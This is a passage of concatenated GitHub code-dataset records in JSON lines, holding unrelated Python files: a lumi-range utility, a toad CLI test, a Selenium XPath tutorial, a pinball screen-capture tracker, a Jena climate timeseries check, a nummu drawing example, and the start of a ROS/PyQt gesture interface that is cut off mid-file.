sel_end) in lumifilter:\n\t\t(sel_start_run, sel_start_lumi) = sel_start\n\t\t(sel_end_run, sel_end_lumi) = sel_end\n\t\tif (sel_start_run == None) or (run >= sel_start_run):\n\t\t\tif (sel_end_run == None) or (run <= sel_end_run):\n\t\t\t\t# At this point, run_lumi is contained in the selected run\n\t\t\t\tif (sel_start_run != None) and (run > sel_start_run):\n\t\t\t\t\tsel_start_lumi = None\n\t\t\t\tif (sel_start_lumi == None) or (lumi >= sel_start_lumi):\n\t\t\t\t\tif (sel_end_run != None) and (run < sel_end_run):\n\t\t\t\t\t\tsel_end_lumi = 
None\n\t\t\t\t\tif (sel_end_lumi == None) or (lumi <= sel_end_lumi):\n\t\t\t\t\t\treturn True\n\treturn False\n\n\ndef formatLumi(lumifilter):\n\t\"\"\" Format lumi filter ranges as strings\n\t>>> formatLumi(map(parseLumiFromString, ['1', '1-', '-1', '1-2']))\n\t['1:MIN-1:MAX', '1:MIN-9999999:MAX', '1:MIN-1:MAX', '1:MIN-2:MAX']\n\t>>> formatLumi(map(parseLumiFromString, ['1:5', '1:5-', '-1:5', '1:5-2:6']))\n\t['1:5-1:5', '1:5-9999999:MAX', '1:MIN-1:5', '1:5-2:6']\n\t>>> formatLumi(map(parseLumiFromString, ['1-:5', ':5-1', ':5-:6']))\n\t['1:MIN-9999999:5', '1:5-1:MAX', '1:5-9999999:6']\n\t>>> formatLumi(map(parseLumiFromString, ['1:5-2', '1-2:5']))\n\t['1:5-2:MAX', '1:MIN-2:5']\n\t\"\"\"\n\tdef formatRange(rlrange):\n\t\t(start, end) = rlrange\n\t\tdefault = lambda x, d: (x, d)[x == None]\n\t\tstart = [default(start[0], '1'), default(start[1], 'MIN')]\n\t\tend = [default(end[0], '9999999'), default(end[1], 'MAX')]\n\t\treturn str.join('-', map(lambda x: '%s:%s' % tuple(x), (start, end)))\n\tif lumifilter:\n\t\treturn map(formatRange, lumifilter)\n\treturn ''\n\n\nif __name__ == '__main__':\n\timport doctest\n\tdoctest.testmod()\n","repo_name":"mortenpi/grid-control","sub_path":"grid-control/packages/grid_control_cms/lumi_tools.py","file_name":"lumi_tools.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7425359513","text":"import pytest\nimport numpy as np\nimport pandas as pd\n\nimport pyximport\n\npyximport.install(setup_args={\"include_dirs\": np.get_include()})\n\nfrom toad.cli import get_parser\n\ndef disable_stdout(fn):\n\n def wrapper(*args):\n import os\n import sys\n\n with open(os.devnull, 'w') as f:\n so = sys.stdout\n sys.stdout = f\n\n fn(*args)\n\n sys.stdout = so\n\n return wrapper\n\n\nparser = get_parser()\n\n\n\n@disable_stdout\ndef test_detect():\n args = parser.parse_args(['detect', '-i', 'tests/test_data.csv'])\n rep = args.func(args)\n assert rep.loc['E', 'unique'] == 20\n\n@pytest.mark.skip(\"tree command will generate a pic in travis-ci log\")\n@disable_stdout\ndef test_tree():\n args = parser.parse_args(['tree', '-i', 'tests/test_data.csv'])\n args.func(args)\n pass\n","repo_name":"amphibian-dev/toad","sub_path":"toad/cli_test.py","file_name":"cli_test.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":431,"dataset":"github-code","pt":"75"} +{"seq_id":"25717886746","text":"#1.Relative X-Path:\r\n#//a[@class=\"btn-orange trial-btn pulse\"]\r\n#2.Absolute X-Path:\r\n#/html/body/nav/div/div[1]/a/img\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom selenium.webdriver.common.by import By\r\nserv_obj=Service(\"C:/Browser drivers/chromedriver_win32/chromedriver.exe\")\r\ndriver=webdriver.Chrome(service=serv_obj)\r\ndriver.get(\"http://automationpractice.com/index.php\")\r\ndriver.maximize_window()\r\n#ABSOLUTE XPATH:\r\n'''driver.find_element(By.XPATH,\"/html/body/div/div[1]/header/div[3]/div/div/div[2]/form/input[4]\").send_keys(\"Mens Tshirts\")\r\ndriver.find_element(By.XPATH,\"/html/body/div/div[1]/header/div[3]/div/div/div[2]/form/button\").click()\r\ndriver.close()'''\r\n#RELATIVE XPATH:\r\n'''driver.find_element(By.XPATH,\"//*[@id='search_query_top']\").send_keys(\"TSHIRT\")\r\ndriver.find_element(By.XPATH,\"//*[@id='searchbox']/button\").click()\r\ndriver.close()'''\r\n#OPTIONS OF XPATH\r\n#1.X-PATH WITH OR:(works if at least one attribute is 
correct)\r\n'''driver.find_element(By.XPATH,\"//input[@id='search_query_top' or @name='search_query']\" ).send_keys(\"tshirts\")\r\ndriver.find_element(By.XPATH,\".//button[@name='submit_search' or @type='submit']\").click()'''\r\n#2.X-PATH WITH AND:(both attributes must be correct)\r\n'''driver.find_element(By.XPATH,\"//input[@id='search_query_top' and @name='search_query']\" ).send_keys(\"tshirts\")\r\ndriver.find_element(By.XPATH,\".//button[@name='submit_search' and @type='submit']\").click()'''\r\n#3.X-PATH WITH CONTAINS (matches a common substring of the attribute value):\r\ndriver.find_element(By.XPATH,\"//input[contains(@id,'search')]\").send_keys(\"Printed Chiffon Dress\");\r\ndriver.find_element(By.XPATH,\"//button[contains(@name,'submit_sea')]\").click()\r\ndriver.close()\r\n#4.X-PATH WITH Starts-with (use when the starting characters of the value stay the same)\r\n'''driver.find_element(By.XPATH,\"//a[text()='women']\").click()'''","repo_name":"Aravindhankarthikeyan/Selenium","sub_path":"Day 2/XPATH.py","file_name":"XPATH.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4681158778","text":"from mss import mss\nimport cv2 as cv\nimport numpy as np\nimport time\nimport pyautogui\nimport pywinauto\nfrom pywinauto import mouse\nfrom Pattern import Number, Words\n\nclass Frames(object):\n def __init__(self):\n self.sct = mss()\n self.lastFrame = None\n self.x = 0\n self.y = 0\n self.v_x = 0\n self.v_y = 0\n self.last_x = 0\n self.last_y = 0\n self.score = 0\n \n self.frame = None\n self.monitor = None\n self.WindowSize = (640, 480)\n \n self.Number_fun = Number()\n self.Words_fun = Words()\n \n def oneFrame(self):\n img, monitor = self.getFrame()\n img = self.getBallContous()\n self.score = self.recScore()\n # if score > self.score: \n # self.score = score\n stage = self.stageChange()\n return img, self.x/monitor['width'], self.y/monitor['height'], self.v_x/monitor['width'], self.v_y/monitor['height'], self.score, stage\n \n def getWindowCoord(self):\n # find the game window\n hwnd = pywinauto.findwindows.find_windows(title='3D Pinball for Windows - Space Cadet')[0]\n # get the game window\n self.gameWindow = pywinauto.application.Application().connect(handle=hwnd)\n # get the game window coordinates\n coordinates = self.gameWindow.window(handle=hwnd).rectangle()\n # change it into a dictionary\n coordinates = {'top': coordinates.top, 'left': coordinates.left, 'width': coordinates.width(), 'height': coordinates.height()}\n # print(coordinates)\n self.monitor = coordinates\n return coordinates\n \n def getFrame(self):\n monitor = self.getWindowCoord()\n # grab the screen\n sct_img = self.sct.grab(monitor)\n # convert to numpy array\n img = np.array(sct_img)\n img = cv.cvtColor(img, cv.COLOR_BGRA2BGR)\n \n # get the inside of the game window\n grey = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n contours, hierarchy = cv.findContours(grey, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n # select contours area > 50\n contours = [c for c in contours if cv.contourArea(c) > 50]\n # if width > height\n if len(contours) > 4:\n # sort the contours by y\n contours = sorted(contours, key=lambda x: cv.boundingRect(x)[1])\n\n if monitor['width'] / monitor['height'] > 640/480:\n x, y, w, h = cv.boundingRect(contours[1])\n top = y\n bottom = y + h\n \n x, y, w, h = cv.boundingRect(contours[3])\n right = x + w\n \n x, y, w, h = cv.boundingRect(contours[2])\n left = x + w - int((bottom - top) * 0.17)\n \n if right - left > 0 and bottom - top 
> 0:\n img = img[top:bottom, left:right]\n else:\n x, y, w, h = cv.boundingRect(contours[3])\n right = x + w\n \n x, y, w, h = cv.boundingRect(contours[2])\n left = x\n top = y\n bottom = y + h\n \n if right - left > 0 and bottom - top > 0:\n img = img[top:bottom, left:right]\n \n # resize the image\n img = cv.resize(img, self.WindowSize)\n self.frame = img\n return img, monitor\n \n def getBallContous(self):\n img = self.frame\n # add mask to find the ball\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n lower = (0, 0, 80)\n upper = (5, 5, 100)\n mask = cv.inRange(hsv, lower, upper)\n result = cv.bitwise_and(img, img, mask=mask)\n # convert to grayscale\n result = cv.cvtColor(result, cv.COLOR_BGR2GRAY)\n\n # find the changes\n if self.lastFrame is None:\n self.lastFrame = result\n self.x = 0\n self.y = 0\n self.v_x = 0\n self.v_y = 0\n self.last_x = 0\n self.last_y = 0\n else:\n changes = cv.absdiff(self.lastFrame, result)\n self.lastFrame = result\n # find the contours\n contours, hierarchy = cv.findContours(changes, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE) \n # draw the contours\n cv.drawContours(img, contours, -1, (0, 255, 0), 3)\n \n if len(contours) == 0:\n self.x = 0\n self.y = 0\n self.v_x = 0\n self.v_y = 0\n else:\n self.y = cv.boundingRect(contours[0])[1]\n for c in contours:\n x, y, w, h = cv.boundingRect(c)\n if y <= self.y:\n self.x = x + (w // 2)\n self.y = y - (h // 2)\n \n self.v_x = self.x - self.last_x\n self.v_y = self.y - self.last_y\n self.last_x = self.x\n self.last_y = self.y\n # draw the rectangle\n cv.rectangle(img, (self.x - 10, self.y), (self.x + 10, self.y + 20), (0, 0, 255), 2)\n # draw the velocity vector\n cv.arrowedLine(img, (self.x, self.y), (self.x + self.v_x, self.y + self.v_y), (255, 0, 0), 2)\n return img\n\n\n def recScore(self):\n # find all the numbers\n img = self.frame\n (x, y, w, h) = (482, 229, 136, 23)\n # cv.rectangle(img, (x, y), (x + w, y + h), (0, 255, 255), 2)\n length_of_number = 15\n space = [4,5,7,8,10,10,12,14]\n score = 0\n for i in range(8):\n number_img = img[y:y + h, x + (length_of_number) * i + space[i] :x + (length_of_number ) * i + length_of_number + space[i]]\n digit = self.Number_fun.compare(number_img)\n cv.rectangle(img, (x + (length_of_number) * i + space[i], y), (x + (length_of_number ) * i + length_of_number + space[i], y + h), (0, 255, 255), 1)\n score = score * 10 + digit\n\n # draw the score \n cv.putText(img, str(score), (x, y - 5), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n return score\n \n def stageChange(self):\n img = self.frame\n stage = self.Words_fun.compare(img)\n if stage > 0:\n print(\"stage: \", stage)\n return stage\n\n def findCancel(self):\n locs = self.Words_fun.findCancel(self.frame)\n \n # change locs in img to locs in monitor \n left = self.monitor['left']\n top = self.monitor['top']\n width = self.monitor['width']\n height = self.monitor['height']\n \n width_ratio = width / self.WindowSize[0]\n height_ratio = height / self.WindowSize[1]\n \n # for loc in locs:\n # x = left + int(loc[0] * width_ratio)\n # y = top + int(loc[1] * height_ratio)\n # mouse.click(button='left', coords=(x, y))\n # print(\"click\",loc[0], loc[1], x, y)\n # time.sleep(0.1)\n \n \n for i in range(left, left + 50, 10):\n for j in range(top + height - 50, top + height, 10):\n print(i, j)\n mouse.click(button='left', coords=(i, j))\n # time.sleep(0.01)\n \n 
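\n# A minimal usage sketch (an assumption for illustration, not part of the original file):\n# it would grab one frame from the pinball window and read the tracked state.\n# f = Frames()\n# img, x, y, v_x, v_y, score, stage = f.oneFrame()\n# cv.imshow('debug', img) # 'debug' window name is arbitrary\n# cv.waitKey(1)\n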
","repo_name":"linan1109/SpaceCadetPinball-AIplayer","sub_path":"Frame.py","file_name":"Frame.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7855350630","text":"from sys import exit\nimport pandas as pd\nimport numpy as np\nfrom tensorflow.keras.utils import timeseries_dataset_from_array\n\npath = '/Users/nickeisenberg/GitRepos/Kaggle/Jena_Climate/DataSet/jena_climate_2009_2016_.csv'\n\ndf = pd.read_csv(path)\n\nvals = df.values\ndates = vals[:, 0]\nvals = np.array(vals[:, 1:], dtype='float32')\n\ntemps = np.array(vals[:, 1], dtype='float32')\n\nnum_train = int(len(temps) * .5)\nnum_val = int(len(temps) * .25)\nnum_test = int(len(temps) - num_train - num_val)\n\ndelay = (6 * 120) + (6 * 24) - 6\ndates_delay = dates[delay:]\ntemps_delay = temps[delay:]\n\ndataset_dates = timeseries_dataset_from_array(\n data=dates,\n sampling_rate=6,\n targets=None,\n sequence_length=120)\n\ndataset_temps = timeseries_dataset_from_array(\n data=temps[: -delay],\n targets=temps[delay:],\n sampling_rate=6,\n sequence_length=120)\n\ndataset = timeseries_dataset_from_array(\n data=vals[: -delay],\n targets=temps[delay:],\n sampling_rate=6,\n sequence_length=120,\n batch_size=256,\n start_index=num_train,\n end_index=num_train + num_val)\n\nerr = 0\nsamples = 0\nfor inps, tars in dataset:\n preds = inps[:, -1, 1]\n err += np.sum(np.abs(preds - tars))\n samples += inps.shape[0]\nprint(err / samples)\n\nexit()\nfor inps, tars in dataset_temps:\n print(inps[0])\n print(tars[0])\n print(df.loc[df['Date Time'] == '06.01.2009 23:10:00'])\n print('')\n print(inps[1])\n print(tars[1])\n print(df.loc[df['Date Time'] == '06.01.2009 23:20:00'])\n break\n\nexit()\nfor dates_ in dataset_dates:\n print(np.array(dates_[0]))\n print(dates_delay[0])\n print('')\n print(np.array(dates_[1]))\n print(dates_delay[1])\n break\n\n","repo_name":"nickeisenberg/Kaggle","sub_path":"Jena_Climate/Notebook/timeseries_dataset_from_array_verification.py","file_name":"timeseries_dataset_from_array_verification.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23089950581","text":"import numpy as np\nfrom nummu import draw\n\nclass Line:\n\n def __init__(self):\n self.y1 = 0\n self.y2 = 100\n\n def update(self, delta):\n self.y1 += delta\n self.y2 -= delta\n if self.y1 >= 100 or self.y2 <= 0:\n raise StopIteration\n\n def draw(self, pallete):\n x1, y1, x2, y2 = 0, self.y1, 100, self.y2\n color = (255, 255, 255)\n draw.line(pallete, x1, y1, x2, y2, color=color)\n\n\ndef main():\n from nummu import Nummu\n nm = Nummu(100, 100)\n nm.add(Line())\n nm.export('line.gif', delay=4)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"soasme/nummu","sub_path":"examples/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17785528745","text":"#!/usr/bin/env python3.8\n\"\"\" Launches Interface Application\n - Loads config from include/custom_settings/application.yaml\n\"\"\"\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nimport sys, random, time, csv, yaml, matplotlib\nmatplotlib.use('Qt5Agg')\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\nfrom collections import deque\n\nimport settings\nif __name__ == 
'__main__': settings.init()\nfrom os_and_utils.nnwrapper import NNWrapper\nimport os_and_utils.move_lib as ml\nif __name__ == '__main__': ml.init()\nimport gestures_lib as gl\nif __name__ == '__main__': gl.init()\nimport os_and_utils.scenes as sl\nif __name__ == '__main__': sl.init()\n\nimport numpy as np\nfrom threading import Thread, Timer\nfrom copy import deepcopy\nfrom os.path import expanduser, isfile, isdir\nfrom os_and_utils.transformations import Transformations as tfm\nfrom os_and_utils.utils import point_by_ratio\nfrom os_and_utils.transformations_utils import is_hand_inside_ball\n\ntry:\n from sklearn.metrics import confusion_matrix\nexcept ModuleNotFoundError:\n print(\"[WARNING*] Sklearn library not installed -> confusion_matrix won't be plotted!\")\n\nimport rospy\n# ros msg classes\nfrom geometry_msgs.msg import Quaternion, Pose, Point\nfrom teleop_gesture_toolbox.srv import ChangeNetwork, SaveHandRecord\n\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nmatplotlib.rcParams.update({'font.size': 25})\nfrom PyQt5 import QtCore, QtWidgets\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\nimport matplotlib.image as mpimg\n\nclass MplCanvas(FigureCanvasQTAgg):\n ''' Paint with matplotlib on window '''\n def __init__(self, parent=None, width=5, height=8, dpi=100):\n ''' Creates two vertical plots\n '''\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.add_subplot(211)\n self.twinxaxes = self.axes.twinx()\n self.axes2 = fig.add_subplot(212)\n #axes2 = fig.add_subplot(122, xlabel='time [s]', ylabel='Total timewarp distance [mm]')\n super(MplCanvas, self).__init__(fig)\n\nclass AnotherWindowPlot(QWidget):\n\n def __init__(self, *args, **kwargs):\n super(QWidget, self).__init__(*args, **kwargs)\n\n self.canvas = MplCanvas(self, width=5, height=4, dpi=100)\n layout = QVBoxLayout()\n layout.addWidget(self.canvas)\n self.setLayout(layout)\n\n max_len = 50\n self.xdata = deque(maxlen=max_len)\n self.ydata = deque(maxlen=max_len)\n\n self.show()\n\n def set_n_series(self, n_series):\n self.n_series = n_series\n\n def update_plot(self, l_hand_type='static', r_hand_type='dynamic', gs_filter=['grab', 'point', 'two', 'three', 'five', 'swipe_up','swipe_down', 'nothing_dyn'], options='log'):\n ''' Might be a little messy when constructing the plot data\n Takes data from ml.md and gl.gd\n Parameters:\n l_hand_type (str): 'static', 'dynamic', ''\n r_hand_type (str): 'static', 'dynamic', ''\n gs_filter (str[]): if not empty -> checks if printed gesture string id is in the list\n options (str): - log (function)\n '''\n\n ''' Compose the data\n '''\n left_gs = []\n if l_hand_type:\n left_stamps = [d.header.stamp for d in getattr(gl.gd.l, l_hand_type)[:].copy()]\n left_values = [d.probabilities for d in getattr(gl.gd.l, l_hand_type)[:].copy()]\n left_values_ = []\n gs = getattr(gl.gd, 'Gs_'+l_hand_type)\n left_gs_ids = []\n for n,g in enumerate(gs):\n if g in gs_filter:\n left_gs_ids.append(n)\n left_gs = np.array(getattr(gl.gd,l_hand_type+'_info')().names)[left_gs_ids]\n for value in left_values:\n left_values_.append(np.array(value)[left_gs_ids])\n left_values = left_values_\n right_gs = []\n if r_hand_type:\n right_stamps = [d.header.stamp for d in getattr(gl.gd.r, r_hand_type)[:].copy()]\n right_values = [d.probabilities for d in getattr(gl.gd.r, r_hand_type)[:].copy()]\n right_values_ = []\n gs = getattr(gl.gd, 'Gs_'+r_hand_type)\n right_gs_ids = []\n for n,g in enumerate(gs):\n if g in gs_filter:\n right_gs_ids.append(n)\n right_gs 
= np.array(getattr(gl.gd,r_hand_type+'_info')().names)[right_gs_ids]\n for value in right_values:\n right_values_.append(np.array(value)[right_gs_ids])\n right_values = right_values_\n # TEMP:\n if 'log' in options:\n right_values = np.array(right_values)\n right_values = (np.log(right_values)-right_values.min())/(right_values.max()-right_values.min())\n\n ''' Creates the list of markers with highest likelihood\n shape=(markers x 2), where marker is [n, id]\n '''\n left_markers = []\n id_last = 999\n for n,values_ in enumerate(left_values):\n id_max = np.argmax(values_)\n if id_max != id_last:\n left_markers.append([n, id_max])\n id_last = id_max\n\n right_markers = []\n id_last = 999\n for n,values_ in enumerate(right_values):\n id_max = np.argmax(values_)\n if id_max != id_last:\n right_markers.append([n, id_max])\n id_last = id_max\n\n ''' Upper plot '''\n self.canvas.axes.cla() # clear the axes content\n self.canvas.twinxaxes.cla()\n self.canvas.axes.plot(left_stamps, left_values,linewidth=7.0)\n self.canvas.twinxaxes.plot(right_stamps, right_values,linewidth=7.0)\n self.canvas.axes.set_xlabel('time [s]')\n self.canvas.axes.set_ylabel(f'Static gestures probability [-]')\n self.canvas.twinxaxes.set_ylabel(f'Dynamic gestures likelihood [-]')\n tmp_gs = []\n if np.array(left_values).any(): tmp_gs.extend(left_gs)\n if np.array(right_values).any(): tmp_gs.extend(right_gs)\n self.canvas.axes.legend(tmp_gs, loc='upper left')\n self.canvas.twinxaxes.legend(right_gs, loc='upper right')\n '''\n for n,id in left_markers:\n np.array(getattr(gl.gd,l_hand_type+'_info')().names)[left_gs_ids][id]\n self.canvas.axes.annotate(left_gs[id], xy=(left_stamps[n], left_values[n][0]), color='black',\n fontsize=\"small\", weight='light',\n horizontalalignment='center',\n verticalalignment='center')\n for n,id in right_markers:\n self.canvas.axes.annotate(right_gs[id], xy=(right_stamps[n], right_values[n][0]), color='black',\n fontsize=\"small\", weight='light',\n horizontalalignment='center',\n verticalalignment='center')\n '''\n '''\n if gs_filter:\n self.canvas.axes.text(0.0, 0.0, \"Only filtered gestures plotted\", color='black',\n fontsize=\"small\", weight='light',\n horizontalalignment='center',\n verticalalignment='top', transform = self.canvas.axes.transAxes)\n '''\n self.canvas.axes.grid(True)\n ''' Bottom plot '''\n #self.canvas.axes2.cla()\n\n # 1\n list_of_actions_hand_inside_ball_left = []\n prev_on = False\n on_stamp = None\n list_of_actions_hand_inside_ball_right = []\n prev_on_right = False\n on_stamp_right = None\n\n # 2\n list_of_actions_hand_visible_left = []\n prev_on_hand_visible = False\n on_stamp_hand_visible = None\n list_of_actions_hand_visible_right = []\n prev_on_hand_visible_right = False\n on_stamp_hand_visible_right = None\n\n lenframes = len(ml.md.frames)\n for n,frm in enumerate(ml.md.frames.copy()):\n # 1 inside ball left\n if is_hand_inside_ball(getattr(frm, 'l')):\n if prev_on == False:\n prev_on = True\n on_stamp = frm.stamp()\n elif n == lenframes-1 and np.array(on_stamp).any():\n list_of_actions_hand_inside_ball_left.append((on_stamp, frm.stamp()-on_stamp))\n else:\n if prev_on == True:\n prev_on = False\n\n list_of_actions_hand_inside_ball_left.append((on_stamp, frm.stamp()-on_stamp))\n\n on_stamp = None\n # 1 inside ball right\n if is_hand_inside_ball(getattr(frm, 'r')):\n if prev_on_right == False:\n prev_on_right = True\n on_stamp_right = frm.stamp()\n elif n == lenframes-1 and np.array(on_stamp_right).any():\n 
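# last frame reached while an interval is still open: close it at the current stamp\n 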
list_of_actions_hand_inside_ball_right.append((on_stamp_right, frm.stamp()-on_stamp_right))\n else:\n if prev_on_right == True:\n prev_on_right = False\n\n list_of_actions_hand_inside_ball_right.append((on_stamp_right, frm.stamp()-on_stamp_right))\n\n on_stamp_right = None\n # 2 visible left\n if getattr(frm, 'l').visible:\n if prev_on_hand_visible == False:\n prev_on_hand_visible = True\n on_stamp_hand_visible = frm.stamp()\n elif n == lenframes-1 and np.array(on_stamp_hand_visible).any():\n list_of_actions_hand_visible_left.append((on_stamp_hand_visible, frm.stamp()-on_stamp_hand_visible))\n else:\n if prev_on_hand_visible == True:\n prev_on_hand_visible = False\n\n list_of_actions_hand_visible_left.append((on_stamp_hand_visible, frm.stamp()-on_stamp_hand_visible))\n\n on_stamp_hand_visible = None\n # 2 visible right\n if getattr(frm, 'r').visible:\n if prev_on_hand_visible_right == False:\n prev_on_hand_visible_right = True\n on_stamp_hand_visible_right = frm.stamp()\n elif n == lenframes-1 and np.array(on_stamp_hand_visible_right).any():\n list_of_actions_hand_visible_right.append((on_stamp_hand_visible_right, frm.stamp()-on_stamp_hand_visible_right))\n else:\n if prev_on_hand_visible_right == True:\n prev_on_hand_visible_right = False\n\n list_of_actions_hand_visible_right.append((on_stamp_hand_visible_right, frm.stamp()-on_stamp_hand_visible_right))\n\n on_stamp_hand_visible_right = None\n\n # 3 activates left\n list_of_actions_activates = []\n list_of_actions_activates_colors = []\n list_of_actions_ids = []\n prev_id_activates = None\n on_stamp_activates = None\n gl_gd_h_t = getattr(getattr(gl.gd, 'l'), l_hand_type)\n lenframes = len(gl_gd_h_t[:])\n\n def id_to_color(id):\n map = {\n 0: 'tab:blue',\n 1: 'tab:orange',\n 2: 'tab:green',\n 3: 'tab:red',\n 4: 'tab:purple',\n 5: 'tab:brown',\n 6: 'tab:pink',\n 7: 'tab:gray',\n 8: 'tab:olive',\n 9: 'tab:cyan'\n }\n return map[id]\n\n list_of_action_activates = []\n for n, frm in enumerate(gl_gd_h_t[:].copy()):\n if not np.isnan(np.array(frm.action_activate_id, dtype=float)).any():\n list_of_action_activates.append(frm.header.stamp)\n\n if not np.isnan(np.array(frm.activate_id, dtype=float)).any():\n if prev_id_activates == None:\n prev_id_activates = frm.activate_id\n on_stamp_activates = frm.header.stamp\n elif n == lenframes-1 and np.array(on_stamp_activates).any():\n list_of_actions_activates.append((on_stamp_activates, frm.header.stamp-on_stamp_activates))\n list_of_actions_activates_colors.append(id_to_color(prev_id_activates))\n list_of_actions_ids.append(prev_id_activates)\n else:\n if prev_id_activates != None:\n list_of_actions_activates.append((on_stamp_activates, frm.header.stamp-on_stamp_activates))\n list_of_actions_activates_colors.append(id_to_color(prev_id_activates))\n list_of_actions_ids.append(prev_id_activates)\n prev_id_activates = None\n on_stamp_activates = None\n\n # 3 activates right\n list_of_actions_activates_right = []\n list_of_actions_activates_colors_right = []\n list_of_actions_ids_right = []\n prev_id_activates = None\n on_stamp_activates = None\n gl_gd_h_t = getattr(getattr(gl.gd, 'r'), r_hand_type)\n lenframes = len(gl_gd_h_t[:])\n\n list_of_action_activates_right = []\n for n, frm in enumerate(gl_gd_h_t[:].copy()):\n if not np.isnan(np.array(frm.action_activate_id, dtype=float)).any():\n list_of_action_activates_right.append(frm.header.stamp)\n\n if not np.isnan(np.array(frm.activate_id, dtype=float)).any():\n if prev_id_activates == None:\n prev_id_activates = frm.activate_id\n on_stamp_activates = 
frm.header.stamp\n elif n == lenframes-1 and np.array(on_stamp_activates).any():\n list_of_actions_activates_right.append((on_stamp_activates, frm.header.stamp-on_stamp_activates))\n list_of_actions_activates_colors_right.append(id_to_color(prev_id_activates))\n list_of_actions_ids_right.append(prev_id_activates)\n else:\n if prev_id_activates != None:\n list_of_actions_activates_right.append((on_stamp_activates, frm.header.stamp-on_stamp_activates))\n list_of_actions_activates_colors_right.append(id_to_color(prev_id_activates))\n list_of_actions_ids_right.append(prev_id_activates)\n prev_id_activates = None\n on_stamp_activates = None\n\n self.canvas.axes2.plot(left_stamps, [0.0]*len(left_stamps))\n self.canvas.axes2.plot(right_stamps, [0.0]*len(right_stamps))\n\n for id, stamp in zip(list_of_actions_ids, list_of_actions_activates):\n self.canvas.axes2.annotate(np.array(getattr(gl.gd,l_hand_type+'_info')().names)[id], xy=(stamp[0], 6+(id+0.5)/3), color='black',\n fontsize=\"small\", weight='light',\n horizontalalignment='center',\n verticalalignment='center')\n for id, stamp in zip(list_of_actions_ids_right, list_of_actions_activates_right):\n self.canvas.axes2.annotate(np.array(getattr(gl.gd,r_hand_type+'_info')().names)[id], xy=(stamp[0], (id+0.5)/3), color='black',\n fontsize=\"small\", weight='light',\n horizontalalignment='center',\n verticalalignment='center')\n self.canvas.axes2.broken_barh(list_of_actions_hand_visible_left, (10, 2), facecolors='tab:green')\n self.canvas.axes2.broken_barh(list_of_actions_hand_inside_ball_left, (8, 2), facecolors='tab:green')\n self.canvas.axes2.broken_barh(list_of_actions_activates, (6, 2), facecolors=list_of_actions_activates_colors)\n self.canvas.axes2.broken_barh(list_of_actions_hand_visible_right, (4, 2), facecolors='tab:blue')\n self.canvas.axes2.broken_barh(list_of_actions_hand_inside_ball_right, (2, 2), facecolors='tab:blue')\n self.canvas.axes2.broken_barh(list_of_actions_activates_right, (0, 2), facecolors=list_of_actions_activates_colors_right)\n\n self.canvas.axes2.set_ylim(0, 12)\n self.canvas.axes2.set_xlabel('time [s]')\n self.canvas.axes2.set_yticks([1, 3, 5, 7, 9, 11], labels=['R, Activated', 'R, At base', 'R, Visible', 'L, Activated', 'L, At base', 'L, visible'])\n self.canvas.axes2.grid(True)\n\n self.canvas.axes2.vlines(x=list_of_action_activates, ymin=6, ymax=12, color='k')\n self.canvas.axes2.vlines(x=list_of_action_activates_right, ymin=0, ymax=6, color='k')\n\n self.canvas.draw_idle()\n\nclass Example(QMainWindow):\n\n def __init__(self):\n super(Example, self).__init__()\n\n with open(settings.paths.custom_settings_yaml+\"recording.yaml\", 'r') as stream:\n recording_data_loaded = yaml.safe_load(stream)\n with open(settings.paths.custom_settings_yaml+\"application.yaml\", 'r') as stream:\n app_data_loaded = yaml.safe_load(stream)\n global LEFT_MARGIN, RIGHT_MARGIN, BOTTOM_MARGIN, ICON_SIZE, TOP_MARGIN, TOP_MARGIN_GESTURES, BAR_MARGIN\n LEFT_MARGIN = app_data_loaded['LEFT_MARGIN']\n RIGHT_MARGIN = app_data_loaded['RIGHT_MARGIN']\n BOTTOM_MARGIN = app_data_loaded['BOTTOM_MARGIN']\n ICON_SIZE = app_data_loaded['ICON_SIZE']\n TOP_MARGIN = app_data_loaded['TOP_MARGIN']\n TOP_MARGIN_GESTURES = TOP_MARGIN + 80\n BAR_MARGIN = app_data_loaded['BAR_MARGIN']\n\n LeftPanelMaxIterms = app_data_loaded['LeftPanelMaxIterms']\n RightPanelMaxIterms = app_data_loaded['RightPanelMaxIterms']\n\n self.setMinimumSize(QSize(500, 400)) # Minimum window size\n self.lbl1 = QLabel('Left Hand', self)\n self.lbl1.setGeometry(20, 36, 150, 50)\n self.lbl2 
